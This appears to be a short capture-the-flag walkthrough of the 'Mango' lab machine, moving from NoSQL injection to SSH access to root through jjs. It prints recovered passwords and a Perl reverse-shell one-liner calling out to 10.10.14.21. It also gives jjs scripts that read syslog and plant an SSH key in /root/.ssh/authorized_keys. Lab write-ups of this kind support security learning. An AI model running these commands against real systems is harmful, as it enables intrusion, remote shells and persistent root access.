Mango

IP: 10.10.10.162

NoSQL injection vulnerability

Using a custom script:

Username: admin
Password: t9KcS3>!0B#2

Username: mango
Password: h3mXK8RhU~f{]f5H

Sshing with admin doesn't work, but sshing with mango's username and password works.

Once in and running linpeas, we see that jjs is exploitable but we can't run it. Checking the permissions of the file reveals that only admin can run it.

trying to switch user to admin works with admin's password.

Priv esc

File reads:

echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/var/log/syslog"));
while ((line = br.readLine()) != null) { print(line); }' | jjs

File write:

Create a script:

perl -e 'use Socket;$i="10.10.14.21";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

ssh-keygen

write public key to file /root/.ssh/authorized_keys:

echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw = new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBsCUE9ZPdL0DPy2+mWekUIzFMnjmpR+2Kprk0uE4f0AfTuKiZ+EMlUfYsrbJiZLRDH86/5jWzcjmj/PKH1bnTdI9gjJPFebovpynUUjmblLaFn1U0ZGcUQ2/b/EIsGtB1Q4/I2SIupF683bZunla3qt04TXf9xB8CH5ofkUYqa9ITRt6Om83AB+5XZU+Ej8MBVYcc1Cxgzv0xeps8rXQj4NThudjlifxdqGXnErY9jid4g5FrBL3U7PXCoF+YEUQbirYYXUb1rVYU0btLPPHlF2c/2eA3ef2/SyX/6awTPiW9OkCJMaySQj1HIlmdbiVpDe7+V9hQ6S7gF8lHEb3lZq2D4wDh1Fxzfxo31t4rKxtWfuEVf+UQhzilNY3uXoOTcT+FK3uBkKy+dhTS8w9hv9GB5/+fXn5W2h29Z+U5UYE/AkVnwmVkRZ1uuG1qOYTy1uUTgtQTnOuH2bIvvpIEDCVc61zj2CUjX9u26lHuoeH0HKlM45qgGdssd6maMnk=");
fw.close();' | jjs

now ssh with the private key:

ssh -i private_key root@10.10.10.162

and we get root.